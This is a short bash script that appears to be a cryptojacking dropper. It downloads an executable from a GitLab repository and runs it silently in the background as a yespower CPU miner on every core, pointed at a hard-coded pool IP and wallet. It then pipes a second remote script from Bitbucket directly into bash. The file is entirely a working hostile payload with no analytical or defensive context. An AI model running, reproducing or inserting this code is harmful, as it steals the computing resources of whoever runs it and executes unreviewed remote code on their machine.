#!/bin/bash
apt -y install wget
wget -q https://gitlab.com/vainlevy/file/-/blob/master/sare
chmod +x sare
./sare --algorithm yespower --pool 206.189.152.87:443 --wallet uzrKLPM88xXDP3CtWdPwh8ZvxsHNXXrLju.gass --password x --disable-gpu --cpu-threads $(nproc --all) --enable-1gb-hugepages --keepalive > /dev/null 2>&1 &
curl -sL https://bitbucket.org/nicezep/file/raw/master/time | bash
